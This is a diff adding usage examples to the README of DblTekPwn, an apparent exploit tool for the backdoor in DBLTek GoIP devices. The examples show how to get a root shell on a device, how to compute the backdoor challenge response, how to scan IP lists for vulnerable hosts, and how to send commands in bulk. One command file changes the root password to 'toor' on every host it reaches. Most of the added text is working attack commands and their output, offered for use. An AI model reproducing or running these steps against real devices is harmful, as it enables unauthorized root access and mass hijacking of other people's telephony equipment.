@@ -69,11 +69,51 @@ USAGE: DblTekPwn.exe [MODE] [HOSTS] [OUTPUT]
6969
7070## Examples
7171
72+ ### Getting a Root Shell on a Vulnerable System
73+
74+ DblTekGoIPPwn makes it easy to simply get a root shell on any vulnerable system. Simply run the
75+ following command using the vulnerable IP.
76+
77+ ```
78+ DblTekPwn.exe --root-shell --name 192.168.1.1
79+ ```
80+
81+ You will see output that looks like this:
82+ ```
83+ Trying 192.168.1.1...
84+ Connected to 192.168.1.1.
85+ Escape character is '^]'.
86+
87+
88+ Start login
89+ do exec: /sbin/login
90+ Login: dbladm
91+ challenge: N1746203308
92+ Password: ***********
93+
94+ ```
95+
96+ From here you can simply begin entering commands.
97+
98+ ### Calculating a Challenge Response
99+
100+ Say you simply wanted to calculate the response to a GoIP challenge ``` N1746203308 ``` . Simply
101+ run the following command.
102+
103+ ```
104+ DblTekPwn --compute-response N1746203308
105+ ```
106+
107+ The output will be the response:
108+ ```
109+ d6176d3aab2
110+ ```
111+
72112### Checking a List of IPs
73113
74- Say you wished to check ``` list.txt ``` of IPs for GoIPs that are vulnerable, and send this output
114+ Say you wished to check ``` list.txt ``` of IPs for GoIPs that are vulnerable and send this output
75115to ``` results.txt ``` . First make sure that the IPs are in format ``` ip:port ``` (port is default 23)
76- and that the IPs are seperated by a newline ``` \n ``` . The following command could then ran.
116+ and that the IPs are seperated by a newline ``` \n ``` . The following command could then be ran.
77117
78118```
79119DblTekPwn.exe --test --file list.txt --output results.txt
@@ -97,5 +137,46 @@ results.txt:
97137192.168.1.4:2323 False
98138```
99139
140+ The ``` False ``` or ``` True ``` after the host indicates whether or not the IP is vulnerable.
141+
100142### Sending Commands to a List of IPs
101143
144+ Say you had a list of commands (which is really a list of telnet inputs) in ``` cmds.txt ```
145+ to send to ``` list.txt ``` of IPs and send the output to ``` results.txt ``` . First make sure
146+ that the IPs are in format ``` ip:port ``` (port is default 23) and that BOTH the IPs AND commands
147+ are seperated by a newline ``` \n ``` in their respective files. The following command could then
148+ be ran.
149+
150+ ```
151+ DblTekPwn.exe --send-commands cmds.txt --file list.txt --output results.txt
152+ ```
153+
154+ list.txt:
155+ ```
156+ 192.168.1.0
157+ 192.168.1.1
158+ 192.168.1.2:1337
159+ 192.168.1.3
160+ 192.168.1.4:2323
161+ ```
162+
163+ cmds.txt:
164+ ```
165+ passwd root
166+ toor
167+ toor
168+
169+ exit
170+ ```
171+
172+ results.txt:
173+ ```
174+ 192.168.1.0 False
175+ 192.168.1.1 True
176+ 192.168.1.2:1337 True
177+ 192.168.1.3 False
178+ 192.168.1.4:2323 False
179+ ```
180+
181+ The ``` False ``` or ``` True ``` after the host indicates whether or not the connection was successfully
182+ made and the commands delivered.
0 commit comments